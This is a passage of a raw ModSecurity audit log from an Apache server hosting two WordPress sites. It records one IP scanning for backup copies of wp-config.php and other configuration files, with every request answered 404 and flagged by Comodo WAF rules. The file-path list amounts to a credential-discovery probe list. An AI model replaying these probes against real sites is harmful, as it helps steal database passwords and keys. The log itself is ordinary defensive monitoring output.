userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.old"] [unique_id "aE3pJ9laOcxgn8EdjwOwIgAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.old"] [unique_id "aE3pJ9laOcxgn8EdjwOwIgAAAAc"] Stopwatch: 1749936423101729 3643 (- - -) Stopwatch2: 1749936423101729 3643; combined=2085, p1=408, p2=1591, p3=0, p4=0, p5=86, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0aa64c3c-Z-- --1e7e6823-A-- [15/Jun/2025:02:57:03.216778 +0530] aE3pJ9AcUP5X8o425y3XIAAAAAQ 185.177.72.108 58022 127.0.0.1 7080 --1e7e6823-B-- GET /wp-config.php.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1e7e6823-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1e7e6823-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.bak"] [unique_id "aE3pJ9AcUP5X8o425y3XIAAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.php.bak"] [unique_id "aE3pJ9AcUP5X8o425y3XIAAAAAQ"] Stopwatch: 1749936423212653 4204 (- - -) Stopwatch2: 1749936423212653 4204; combined=2763, p1=521, p2=2120, p3=0, p4=0, p5=122, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1e7e6823-Z-- --6f53be73-A-- [15/Jun/2025:02:57:03.327568 +0530] aE3pJ-Xds7bzDL-AINRY4gAAAAM 185.177.72.108 58034 127.0.0.1 7080 --6f53be73-B-- GET /wp-config.php.dist HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6f53be73-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6f53be73-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.dist"] [unique_id "aE3pJ-Xds7bzDL-AINRY4gAAAAM"] Stopwatch: 1749936423324069 3564 (- - -) Stopwatch2: 1749936423324069 3564; combined=2173, p1=542, p2=1572, p3=0, p4=0, p5=59, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f53be73-Z-- --4f700152-A-- [15/Jun/2025:02:57:03.437975 +0530] aE3pJ_CFSLfJixou_W0k3QAAAAY 185.177.72.108 58040 127.0.0.1 7080 --4f700152-B-- GET /wp-config.php.inc HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4f700152-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4f700152-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.inc"] [unique_id "aE3pJ_CFSLfJixou_W0k3QAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.php.inc"] [unique_id "aE3pJ_CFSLfJixou_W0k3QAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.inc' not found or unable to stat Stopwatch: 1749936423435084 2960 (- - -) Stopwatch2: 1749936423435084 2960; combined=1696, p1=362, p2=1259, p3=0, p4=0, p5=75, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4f700152-Z-- --ec618121-A-- [15/Jun/2025:02:57:03.549510 +0530] aE3pJyQOy0yoNZQ7dslNuwAAAAk 185.177.72.108 58044 127.0.0.1 7080 --ec618121-B-- GET /wp-config.php.old HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ec618121-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ec618121-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.old"] [unique_id "aE3pJyQOy0yoNZQ7dslNuwAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.php.old"] [unique_id "aE3pJyQOy0yoNZQ7dslNuwAAAAk"] Stopwatch: 1749936423546032 3560 (- - -) Stopwatch2: 1749936423546032 3560; combined=2135, p1=399, p2=1644, p3=0, p4=0, p5=91, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec618121-Z-- --d527b22e-A-- [15/Jun/2025:02:57:03.659737 +0530] aE3pJzpSduy_dUF9ffnD1gAAAAU 185.177.72.108 58054 127.0.0.1 7080 --d527b22e-B-- GET /wp-config.php.save HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d527b22e-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d527b22e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.save"] [unique_id "aE3pJzpSduy_dUF9ffnD1gAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.save' not found or unable to stat Stopwatch: 1749936423656715 3076 (- - -) Stopwatch2: 1749936423656715 3076; combined=1735, p1=379, p2=1285, p3=0, p4=0, p5=70, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d527b22e-Z-- --af024112-A-- [15/Jun/2025:02:57:03.770490 +0530] aE3pJ9laOcxgn8EdjwOwIwAAAAc 185.177.72.108 58068 127.0.0.1 7080 --af024112-B-- GET /wp-config.php.swp HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --af024112-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --af024112-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.swp"] [unique_id "aE3pJ9laOcxgn8EdjwOwIwAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.swp' not found or unable to stat Stopwatch: 1749936423767174 3381 (- - -) Stopwatch2: 1749936423767174 3381; combined=1963, p1=418, p2=1482, p3=0, p4=0, p5=63, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --af024112-Z-- --1810863b-A-- [15/Jun/2025:02:57:03.881195 +0530] aE3pJ-Xds7bzDL-AINRY4wAAAAM 185.177.72.108 58070 127.0.0.1 7080 --1810863b-B-- GET /wp-config.php.txt HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1810863b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1810863b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.txt"] [unique_id "aE3pJ-Xds7bzDL-AINRY4wAAAAM"] Stopwatch: 1749936423877802 3449 (- - -) Stopwatch2: 1749936423877802 3449; combined=2096, p1=385, p2=1651, p3=0, p4=0, p5=60, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1810863b-Z-- --49b4ee5d-A-- [15/Jun/2025:02:57:03.991647 +0530] aE3pJ_BViRrxRfhQ2snRPwAAAAE 185.177.72.108 58080 127.0.0.1 7080 --49b4ee5d-B-- GET /wp-config.php.zip HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --49b4ee5d-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --49b4ee5d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.zip"] [unique_id "aE3pJ_BViRrxRfhQ2snRPwAAAAE"] Stopwatch: 1749936423988441 3262 (- - -) Stopwatch2: 1749936423988441 3262; combined=1979, p1=374, p2=1546, p3=0, p4=0, p5=59, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49b4ee5d-Z-- --0b381f25-A-- [15/Jun/2025:02:57:04.115206 +0530] aE3pKPCFSLfJixou_W0k3gAAAAY 185.177.72.108 58086 127.0.0.1 7080 --0b381f25-B-- GET /wp-config.php~ HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0b381f25-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0b381f25-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php~"] [unique_id "aE3pKPCFSLfJixou_W0k3gAAAAY"] Stopwatch: 1749936424112418 2863 (- - -) Stopwatch2: 1749936424112418 2863; combined=1615, p1=354, p2=1206, p3=0, p4=0, p5=55, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b381f25-Z-- --dfce7b13-A-- [15/Jun/2025:02:57:04.120162 +0530] aE3pJuQxpfcsz2uNnR-jyQAAAAI 185.177.72.108 53854 127.0.0.1 7081 --dfce7b13-B-- GET /htaccess_for_page_not_found_redirects.htaccess HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dfce7b13-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 WPO-Cache-Status: not cached WPO-Cache-Message: The file path is unsuitable for caching (/htaccess_for_page_not_found_redirects.htaccess) Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --dfce7b13-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/htaccess_for_page_not_found_redirects.htaccess"] [unique_id "aE3pJuQxpfcsz2uNnR-jyQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936422503757 1616466 (- - -) Stopwatch2: 1749936422503757 1616466; combined=1790, p1=390, p2=1332, p3=0, p4=0, p5=67, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfce7b13-Z-- --f683e673-A-- [15/Jun/2025:02:57:05.136495 +0530] aE3pKeXds7bzDL-AINRY5QAAAAM 185.177.72.108 58176 127.0.0.1 7080 --f683e673-B-- GET /application.properties.bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f683e673-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f683e673-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/application.properties.bak"] [unique_id "aE3pKeXds7bzDL-AINRY5QAAAAM"] Stopwatch: 1749936425133102 3457 (- - -) Stopwatch2: 1749936425133102 3457; combined=2095, p1=332, p2=1672, p3=0, p4=0, p5=91, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f683e673-Z-- --3e0fb666-A-- [15/Jun/2025:02:58:39.429058 +0530] aE3phfBViRrxRfhQ2snRXgAAAAE 185.177.72.108 38656 127.0.0.1 7081 --3e0fb666-B-- GET /config.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3e0fb666-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --3e0fb666-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.bak"] [unique_id "aE3phfBViRrxRfhQ2snRXgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936517859810 1569332 (- - -) Stopwatch2: 1749936517859810 1569332; combined=2093, p1=375, p2=1602, p3=0, p4=0, p5=116, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3e0fb666-Z-- --fe86e917-A-- [15/Jun/2025:02:58:45.272092 +0530] aE3pi_CFSLfJixou_W0lAQAAAAY 185.177.72.108 39492 127.0.0.1 7081 --fe86e917-B-- GET /config.dat HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fe86e917-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --fe86e917-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/config.dat"] [unique_id "aE3pi_CFSLfJixou_W0lAQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936523720306 1551875 (- - -) Stopwatch2: 1749936523720306 1551875; combined=2544, p1=476, p2=1973, p3=0, p4=0, p5=94, sr=161, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. 